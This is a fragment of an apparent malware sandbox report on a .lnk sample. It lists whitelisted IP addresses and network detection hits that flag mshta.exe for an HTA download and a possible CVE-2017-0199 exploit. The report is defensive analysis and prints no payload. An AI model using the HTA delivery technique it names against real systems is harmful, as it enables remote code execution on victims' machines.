  • 20.190.159.71
  • 20.190.159.0
  • 40.126.31.73
whitelisted

Threats

PID
Process
Class
Message
3604
mshta.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
3604
mshta.exe
Attempted User Privilege Gain
ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
1412
svchost.exe
Misc activity
ET INFO Microsoft Connection Test
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
ITEMS -98765456.lnk